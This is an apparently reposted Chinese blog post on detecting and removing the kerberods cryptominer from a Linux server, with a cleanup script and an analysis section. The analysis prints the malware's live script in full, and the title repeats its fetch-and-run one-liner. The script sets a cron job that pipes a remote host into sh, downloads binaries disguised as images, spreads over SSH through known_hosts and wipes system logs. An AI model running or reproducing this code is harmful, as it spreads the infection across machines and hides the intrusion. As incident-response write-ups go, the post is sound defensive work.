Linux服務器感染kerberods病毒 | 挖礦病毒查殺及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh
概要:html
1、症狀及表現redis
2、查殺方法docker
3、病毒分析數據庫
4、安全防禦tomcat
5、參考文章安全
1、症狀及表現bash
一、CPU使用率異常,top命令顯示CPU統計數數據均爲0,利用busybox 查看CPU佔用率以後,發現CPU被大量佔用;服務器
*注:ls top ps等命令已經被病毒的動態連接庫劫持,沒法正常使用,你們須要下載busybox,具體的安裝和下載步驟參見參考文章(https://blog.csdn.net/u010457406/article/details/89328869)。網絡
二、crontab 定時任務異常,存在如下內容;app
三、後期病毒變異,劫持sshd,致使遠程登錄失敗,偶爾還會跳出定時任務失敗,收到新郵件等問題;
四、 存在異常文件、異常進程以及異常開機項
2、查殺方法
一、斷網,中止定時任務服務;
二、查殺病毒主程序,以及保護病毒的其餘進程;
三、恢復被劫持的動態連接庫和開機服務;
四、重啓服務器和服務;
附查殺腳本(根據狀況修改)
(腳本參考(https://blog.csdn.net/u010457406/article/details/89328869))
1 #!/bin/bash 2 #能夠重複執行幾回,防止互相拉起致使刪除失敗 3 4 function installBusyBox(){ 5 #參考第一段 6 busybox|grep BusyBox |grep v 7 } 8 9 function banHosts(){ 10 #刪除免密認證,防止繼續經過ssh進行擴散,後續需自行恢復,可不執行 11 busybox echo "" > /root/.ssh/authorized_keys 12 busybox echo "" > /root/.ssh/id_rsa 13 busybox echo "" > /root/.ssh/id_rsa.pub 14 busybox echo "" > /root/.ssh/known_hosts 15 #busybox echo "" > /root/.ssh/auth 16 #iptables -I INPUT -p tcp --dport 445 -j DROP 17 busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com\n0.0.0.0 systemten.org" >> /etc/hosts 18 } 19 20 21 function fixCron(){ 22 #修復crontab 23 busybox chattr -i /etc/cron.d/root 2>/dev/null 24 busybox rm -f /etc/cron.d/root 25 busybox chattr -i /var/spool/cron/root 2>/dev/null 26 busybox rm -f /var/spool/cron/root 27 busybox chattr -i /var/spool/cron/tomcat 2>/dev/null 28 busybox rm -f /var/spool/cron/tomcat 29 busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null 30 busybox rm -f /var/spool/cron/crontabs/root 31 busybox rm -rf /var/spool/cron/tmp.* 32 busybox rm -rf /var/spool/cron/crontabs 33 busybox touch /var/spool/cron/root 34 busybox chattr +i /var/spool/cron/root 35 } 36 37 function killProcess(){ 38 #修復異常進程 39 #busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 40 #busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 41 #busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 42 #busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 43 #busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 44 busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/kerberods' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 45 busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 46 busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/kauditds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 47 busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null 48 busybox rm -f /tmp/khugepageds 49 busybox rm -f /tmp/migrationds 50 busybox rm -f /tmp/sshd 51 busybox rm -f /tmp/kauditds 52 busybox rm -f /tmp/migrationds 53 busybox rm -f /usr/sbin/sshd 54 busybox rm -f /usr/sbin/kerberods 55 busybox rm -f /usr/sbin/kthrotlds 56 busybox rm -f /usr/sbin/kintegrityds 57 busybox rm -f /usr/sbin/kpsmouseds 58 busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf 59 } 60 61 62 function clearLib(){ 63 #修復動態庫 64 busybox chattr -i /etc/ld.so.preload 65 busybox rm -f /etc/ld.so.preload 66 busybox rm -f /usr/local/lib/libcryptod.so 67 busybox rm -f /usr/local/lib/libcset.so 68 busybox chattr -i /etc/ld.so.preload 2>/dev/null 69 busybox chattr -i /usr/local/lib/libcryptod.so 2>/dev/null 70 busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null 71 busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf 72 busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf 73 busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf 74 busybox rm -f /etc/ld.so.cache 75 busybox rm -f /etc/ld.so.preload 76 busybox rm -f /usr/local/lib/libcryptod.so 77 busybox rm -f /usr/local/lib/libcset.so 78 busybox rm -rf /usr/local/lib/libdevmapped.so 79 busybox rm -rf /usr/local/lib/libpamcd.so 80 busybox rm -rf /usr/local/lib/libdevmapped.so 81 busybox touch /etc/ld.so.preload 82 busybox chattr +i /etc/ld.so.preload 83 ldconfig 84 } 85 86 function clearInit(){ 87 #修復異常開機項 88 #chkconfig netdns off 2>/dev/null 89 #chkconfig –del netdns 2>/dev/null 90 #systemctl disable netdns 2>/dev/null 91 busybox rm -f /etc/rc.d/init.d/kerberods 92 busybox rm -f /etc/init.d/netdns 93 busybox rm -f /etc/rc.d/init.d/kthrotlds 94 busybox rm -f /etc/rc.d/init.d/kpsmouseds 95 busybox rm -f /etc/rc.d/init.d/kintegrityds 96 busybox rm -f /etc/rc3.d/S99netdns 97 #chkconfig watchdogs off 2>/dev/null 98 #chkconfig --del watchdogs 2>/dev/null 99 #chkconfig --del kworker 2>/dev/null 100 #chkconfig --del netdns 2>/dev/null 101 } 102 103 function recoverOk(){ 104 service crond start 105 busybox sleep 3 106 busybox chattr -i /var/spool/cron/root 107 # 將殺毒進程加入到定時任務中,屢次殺毒 108 echo "*/10 * * * * /root/kerberods_kill.sh" | crontab - 109 # 恢復被劫持的sshd 服務 110 #busybox cp ~/sshd_new /usr/sbin/sshd 111 #service sshd restart 112 echo "OK,BETTER REBOOT YOUR DEVICE" 113 } 114 115 #先中止crontab服務 116 echo "1| stop crondtab service!" 117 service crond stop 118 #防止病毒繼續擴散 119 echo "2| banHosts!" 120 banHosts 121 #清除lib劫持 122 echo "3| clearLib!" 123 clearLib 124 #修復crontab 125 echo "4| fixCron!" 126 fixCron 127 #清理病毒進程 128 echo "5| killProcess!" 129 killProcess 130 #刪除異常開機項 131 echo "6| clearInit! " 132 clearInit 133 #重啓服務和系統 134 echo "7| recover!" 135 recoverOk
查殺完成之後重啓服務器,發現過段時間,登錄主機,不管本地仍是ssh遠程登錄,依然會有病毒進程被拉起,觀察top裏面的進程,並用pstree 回溯進程之間的關係,發現每次用戶登錄就會有病毒進程被拉起,懷疑登錄時加載文件存在問題,逐個排查下列文件:
- /etc/profile,
- ~/.profile,
- ~/.bash_login,
- ~/.bash_profile,
- ~/.bashrc,
- /etc/bashrc;
最後終於發現/etc/bashrc 文件被加入了一些似曾相識的語句
刪除而且再次查殺病毒(重複以前查殺步驟),重啓服務器,觀察一段時間後再也不有病毒程序被拉起,至此病毒被查殺徹底。
3、病毒分析
一、感染路徑
- 攻擊者經過網絡進入第一臺被感染的機器(redis未認證漏洞、ssh密碼暴力破解登陸等)。
- 第一臺感染的機器會讀取known_hosts文件,遍歷ssh登陸,若是是作了免密登陸認證,則將直接進行橫向傳播。
二、病毒主要模塊
- 主惡意程序:kerberods
- 惡意Hook庫:libcryptod.so libcryptod.c
- 挖礦程序:khugepageds
- 惡意腳本文件:netdns (用做kerberods的啓停等管理)
- 惡意程序:sshd (劫持sshd服務,每次登錄都可拉起病毒進程)
三、執行順序
① 執行惡意腳本下載命令
② 主進程操做
1> 添加至開機啓動,以及/etc/bashrc
2> 生成了sshd文件 劫持sshd服務
3> 將netdns文件設置爲開機啓動
4> 編譯libcryptod.c爲/usr/local/lib/libcryptod.so
5> 預加載動態連接庫,惡意hook關鍵系統操做函數
6> 修改/etc/cron.d/root文件,增長定時任務
7> 拉起khugepageds挖礦進程
附病毒惡意進程代碼
1 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin 2 3 mkdir -p /tmp 4 chmod 1777 /tmp 5 6 echo "* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab - 7 8 ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 10 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 11 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 12 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 13 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 14 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 15 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 16 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 17 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 18 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 19 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 20 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 21 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 22 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 23 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 24 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 25 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 26 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 27 ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9 28 ps -ef|grep -v grep|grep "axgtbc"|awk '{print $2}'|xargs kill -9 29 ps -ef|grep -v grep|grep "axgtfa"|awk '{print $2}'|xargs kill -9 30 ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9 31 ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9 32 ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9 33 34 cd /tmp 35 touch /usr/local/bin/writeable && cd /usr/local/bin/ 36 touch /usr/libexec/writeable && cd /usr/libexec/ 37 touch /usr/bin/writeable && cd /usr/bin/ 38 rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable 39 export PATH=$PATH:$(pwd) 40 if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then 41 chattr -i sshd 42 rm -rf sshd 43 ARCH=$(uname -m) 44 if [ ${ARCH}x = "x86_64x" ]; then 45 (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) && chmod +x sshd 46 else 47 (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) && chmod +x sshd 48 fi 49 $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd 50 fi 51 52 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then 53 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done 54 fi 55 56 for file in /home/* 57 do 58 if test -d $file 59 then 60 if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then 61 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done 62 fi 63 fi 64 done 65 66 echo 0>/var/spool/mail/root 67 echo 0>/var/log/wtmp 68 echo 0>/var/log/secure 69 echo 0>/var/log/cron 70 #
4、安全防禦
- SSH
① 謹慎作免密登陸
② 儘可能不使用默認的22端口
③ 加強root密碼強度 - Redis
① 增長受權認證(requirepass參數)
② 儘可能使用docker版本(docker pull redis)
③ 隱藏重要的命令
5、參考文章
相關文章
- 1. 挖礦病毒
- 2. 挖礦病毒排查
- 3. 轉:Linux常見挖礦病毒查殺
- 4. miner2 挖礦病毒
- 5. 2t3ik與ddgs挖礦病毒處理
- 6. 病毒分析之Virut病毒感染樣本分析(setup.exe)
- 7. 病毒查殺
- 8. 服務器挖礦病毒的排查過程
- 9. 服務器被植入挖礦程序 該怎麼查殺挖礦病毒
- 10. Linux應急響應(三):挖礦病毒
- 更多相關文章...
- • XSLT - 在服務器端 - XSLT 教程
- • 服務器上的 XML - XML 教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
- • 算法總結-二分查找法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 挖礦病毒
- 2. 挖礦病毒排查
- 3. 轉:Linux常見挖礦病毒查殺
- 4. miner2 挖礦病毒
- 5. 2t3ik與ddgs挖礦病毒處理
- 6. 病毒分析之Virut病毒感染樣本分析(setup.exe)
- 7. 病毒查殺
- 8. 服務器挖礦病毒的排查過程
- 9. 服務器被植入挖礦程序 該怎麼查殺挖礦病毒
- 10. Linux應急響應(三):挖礦病毒